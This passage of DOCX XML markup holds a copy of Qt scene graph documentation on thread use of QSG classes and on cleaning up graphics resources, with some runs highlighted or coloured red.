          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note: </w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All classes with QSG prefix should be used solely on the scene graph's rendering thread.</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> See </w:t>
      </w:r>
      <w:hyperlink r:id="rId2867" w:anchor="scene-graph-and-rendering" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph and Rendering</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="001945D5" w:rsidRDefault="0069433A" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2601" w:name="graphics-resource-handling"/>
      <w:bookmarkStart w:id="2602" w:name="_Toc483001100"/>
      <w:bookmarkStart w:id="2603" w:name="_Toc483004069"/>
      <w:bookmarkStart w:id="2604" w:name="_Toc483604433"/>
      <w:bookmarkStart w:id="2605" w:name="_Toc483605653"/>
      <w:bookmarkEnd w:id="2601"/>
      <w:r w:rsidRPr="001945D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Graphics Resource Handling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2602"/>
      <w:bookmarkEnd w:id="2603"/>
      <w:bookmarkEnd w:id="2604"/>
      <w:bookmarkEnd w:id="2605"/>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The preferred way to handle cleanup of graphics resources used in the scene graph, is to rely on the automatic cleanup of nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. A </w:t>
      </w:r>
      <w:hyperlink r:id="rId2868" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> returned from </w:t>
      </w:r>
      <w:hyperlink r:id="rId2869" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() is automatically deleted on the right thread at the right time. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trees of </w:t>
      </w:r>
      <w:hyperlink r:id="rId2870" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> instances are managed through the use of </w:t>
      </w:r>
      <w:hyperlink r:id="rId2871" w:anchor="Flag-enum" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode::OwnedByParent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which is set by default</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>So, for the majority of custom scene graph items, no extra work will be required</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implementations that store graphics resources outside the node tree, such as an item implementing </w:t>
      </w:r>
      <w:hyperlink r:id="rId2872" w:anchor="textureProvider" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::textureProvider</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(), will need to take care in cleaning it up correctly depending on how the item is used in QML</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>situations to handle</w:t>
      </w:r>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="00CA76F2" w:rsidRDefault="0069433A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The scene graph is invalidated; This can happen, for instance, if the window is hidden using </w:t>
      </w:r>
      <w:hyperlink r:id="rId2873" w:anchor="hide" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::hide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(). If the item class implements a slot named invalidateSceneGraph(), this slot will be called on the rendering thread while the GUI thread is blocked. This is equivalent to connecting to </w:t>
      </w:r>
      <w:hyperlink r:id="rId2874" w:anchor="sceneGraphInvalidated" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::sceneGraphInvalidated</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(). The OpenGL context of this item's window will be bound when this slot is called. The only exception is if the native OpenGL has been destroyed outside Qt's control, for instance through EGL_CONTEXT_LOST.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="00CA76F2" w:rsidRDefault="0069433A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The item is removed from the scene; If an item is taken out of the scene, for instance because it's parent was set to null or an item in another window, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2875" w:anchor="releaseResources" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::releaseResources</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() will be called on the GUI thread. </w:t>
      </w:r>
      <w:hyperlink r:id="rId2876" w:anchor="scheduleRenderJob" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::scheduleRenderJob</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() should be used to schedule cleanup of rendering resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="00CA76F2" w:rsidRDefault="0069433A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The item is deleted; When the destructor if an item runs, it should delete any graphics resources it has. If neither of the two conditions above were already met, the item will be part of a window and it is possible to use </w:t>
      </w:r>
      <w:hyperlink r:id="rId2877" w:anchor="scheduleRenderJob" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::scheduleRenderJob</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() to have them cleaned up. If an implementation ignores the call to </w:t>
      </w:r>
      <w:hyperlink r:id="rId2878" w:anchor="releaseResources" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::releaseResources</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(), the item will in many cases no longer have access to a </w:t>
      </w:r>
      <w:hyperlink r:id="rId2879" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and thus no means of scheduling cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="0069433A" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When scheduling cleanup of graphics resources using </w:t>
      </w:r>
      <w:hyperlink r:id="rId2880" w:anchor="scheduleRenderJob" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::scheduleRenderJob</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(), one should use either </w:t>
      </w:r>
      <w:hyperlink r:id="rId2881" w:anchor="RenderStage-enum" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::BeforeSynchronizingStage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:hyperlink r:id="rId2882" w:anchor="RenderStage-enum" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::AfterSynchronizingStage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The </w:t>
      </w:r>
      <w:hyperlink r:id="rId2883" w:anchor="scene-graph-and-rendering" w:history="1">
        <w:r w:rsidRPr="0069433A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>synchronization stage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0069433A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> is where the scene graph is changed as a result of changes to the QML tree. If cleanup is scheduled at any other time, it may result in other parts of the scene graph referencing the newly deleted objects as these parts have not been updated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="00CA76F2" w:rsidRDefault="0069433A" w:rsidP="0069433A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use of </w:t>
      </w:r>
      <w:hyperlink r:id="rId2884" w:anchor="deleteLater" w:history="1">
        <w:r w:rsidRPr="00CA76F2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject::deleteLater</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() to clean up graphics resources is not recommended as this will run at an arbitrary time and it is unknown if there will be an OpenGL context bound when the deletion takes place.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0069433A" w:rsidRPr="001945D5" w:rsidRDefault="0069433A" w:rsidP="001945D5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2606" w:name="custom-qpainter-items"/>
      <w:bookmarkStart w:id="2607" w:name="_Toc483001101"/>
      <w:bookmarkStart w:id="2608" w:name="_Toc483004070"/>
      <w:bookmarkStart w:id="2609" w:name="_Toc483604434"/>
      <w:bookmarkStart w:id="2610" w:name="_Toc483605654"/>
